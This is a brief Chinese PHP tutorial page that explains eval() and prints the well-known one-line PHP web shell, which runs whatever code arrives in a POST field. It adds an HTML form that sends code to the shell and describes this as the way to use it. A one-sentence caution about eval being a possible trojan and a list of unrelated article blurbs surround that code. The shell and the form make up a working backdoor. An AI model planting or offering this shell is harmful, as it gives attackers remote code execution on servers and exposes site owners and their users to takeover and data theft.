php eval函数一句话木马代码
更新时间:2015年05月21日 11:03:25 投稿:hebedich
这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
相关文章
for语句可以说是PHP(同时也是多种语言)的循环控制部份最基本的一个语句了,for语句的执行规律和基础用法在这里就不多说,可以参见PHP手册for语句部分2012-01-01
这篇文章主要介绍了PHP封装的PDO数据库操作类,结合具体实例形式分析了php基于PDO针对数据库的增删改查、事务、批量添加等相关操作技巧,需要的朋友可以参考下2017-06-06
这篇文章主要介绍了PHP封装的非对称加密RSA算法,结合实例形式分析了php实现的RSA加密算法类及其相关使用技巧,需要的朋友可以参考下2018-05-05
PHP中也引入了引用类型,在对对象赋值传递上,基本可视为是同于Java/C#的引用传递(具体请见Objects and references)。但同时又支持在基础类型上通过引用运算符(&)来获得内容的引用。不过在实际的使用中,PHP的引用类型因为整个PHP设计结构而存在着许多的问题,使得在程序出现非预计的结果2012-09-09
这篇文章主要介绍了php的dl函数用法,以实例形式讲述了利用dl函数突破PHP设置上的限制,是非常实用的技巧,需要的朋友可以参考下2014-11-11
这篇文章主要介绍了PHP判断一个字符串是否是回文字符串的方法,实例分析了php操作字符串判断回文的技巧,具有一定参考借鉴价值,需要的朋友可以参考下2015-03-03
这篇文章主要介绍了PHP判断文章里是否有图片的方法,很实用的功能,需要的朋友可以参考下2014-07-07
以下是对php中的数组与字符串的转换函数进行了详细的整理汇总,需要的朋友可以参考下2013-07-07
在本文里我们给大家整理了关于php7新特性的理解和比较以及相关实例代码内容,正在学习的朋友们参考下。2019-04-04
这篇文章主要介绍了PHP重载的相关知识,帮助大家更好的理解和复习php,感兴趣的朋友可以了解下2020-09-09
最新评论